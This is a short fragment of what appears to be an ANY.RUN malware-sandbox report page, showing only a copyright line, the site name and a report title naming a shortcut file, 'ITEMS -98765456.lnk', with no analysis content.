© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
ITEMS -98765456.lnk